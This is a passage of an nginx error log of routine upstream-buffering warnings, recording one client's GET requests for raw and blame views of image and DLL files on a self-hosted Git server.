"http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 14:16:36 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/23/0000014231 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 14:16:49 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/23/0000014232 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png" +2026/02/17 14:16:57 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/23/0000014233 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png" +2026/02/17 14:17:03 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/23/0000014234 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png" +2026/02/17 14:18:23 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/23/0000014235 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll" +2026/02/17 14:18:37 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/23/0000014236 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll" +2026/02/17 14:19:05 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/23/0000014237 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll" +2026/02/17 14:19:08 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/23/0000014238 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll" +2026/02/17 14:19:19 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/23/0000014239 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll" +2026/02/17 14:19:33 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/24/0000014240 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll" +2026/02/17 14:20:56 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/24/0000014241 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 14:21:03 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/24/0000014242 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png" +2026/02/17 14:21:06 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/24/0000014243 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 14:21:08 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/24/0000014244 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" +2026/02/17 14:21:18 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/24/0000014245 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png" +2026/02/17 14:21:25 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/24/0000014246 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png" +2026/02/17 14:21:32 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/24/0000014247 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png" +2026/02/17 14:21:39 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/24/0000014248 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png" +2026/02/17 14:23:36 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/24/0000014249 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll" +2026/02/17 14:25:26 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/25/0000014250 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll" +2026/02/17 14:25:56 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/25/0000014251 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll" +2026/02/17 14:27:57 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/25/0000014252 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" +2026/02/17 14:27:59 [warn] 918#918: *53281 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/25/0000014253 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" +2026/02/17 14:28:45 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/25/0000014254 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=ignore-change", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=show-all" +2026/02/17 14:31:21 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/25/0000014255 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html" +2026/02/17 14:31:31 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/25/0000014256 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png" +2026/02/17 14:31:38 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/25/0000014257 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png" +2026/02/17 14:31:46 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/25/0000014258 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 14:31:52 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/25/0000014259 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png" +2026/02/17 14:31:59 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/26/0000014260 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png" +2026/02/17 14:32:03 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/26/0000014261 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 14:32:09 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/26/0000014262 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png" +2026/02/17 14:33:21 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/26/0000014263 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png" +2026/02/17 14:33:29 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/26/0000014264 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png" +2026/02/17 14:33:38 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/26/0000014265 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png" +2026/02/17 14:33:46 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/26/0000014266 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 14:33:53 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/26/0000014267 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png" +2026/02/17 14:34:00 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/26/0000014268 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png" +2026/02/17 14:34:06 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/26/0000014269 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png" +2026/02/17 14:34:14 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/27/0000014270 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png" +2026/02/17 14:34:16 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/27/0000014271 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 14:36:09 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/27/0000014272 while reading upstream, client: 